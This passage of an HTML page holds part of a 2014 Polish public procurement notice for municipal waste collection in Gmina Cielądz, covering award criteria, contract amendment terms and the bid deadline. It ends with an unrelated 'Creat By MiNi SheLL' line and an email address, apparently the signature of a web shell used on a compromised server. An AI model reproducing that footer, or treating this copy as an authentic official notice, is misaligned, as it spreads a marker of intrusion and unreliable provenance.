<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Deklarowany poziom ograniczenia mas odpadów komunalnych ulegająch biodegradacji przekazywanych do składowanaia odebranych na terenie Gminy Cielądz - 2</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wzór umowy stanowi integralną część niniejszej SIWZ. 
2.Zgodnie z art. 144 ust.1 ustawy Prawo zamówień publicznych Zamawiający dopuszcza możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy. W szczególności postanowienia umowy mogą ulec zmianie w zakresie:
1) zmiany terminu wykonania zamówienia w przypadku konieczności uwzględnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy o udzielenie zamówienia publicznego, 
2) zmiany wysokości wynagrodzenia wyko?nawcy w następujących warunkach:
a)  w przypadku zmiany stawki podatku od towarów i usług,
b) w przypadku zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz.U. Nr 200, poz. 1679 z późn. zm),
c) w przypadku zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdro-wotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne,
- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę.
3. Możliwość wprowadzenia w/w zmian uzależniona jest od przyjęcia w formie pisemnej aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.cieladz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Cielądzu
96-214 Cielądz
Cielądz 59.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.12.2014 godzina 09:00, miejsce: Urząd Gminy w Cielądzu
96-214 Cielądz
Cielądz 59
pokój nr 9 Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com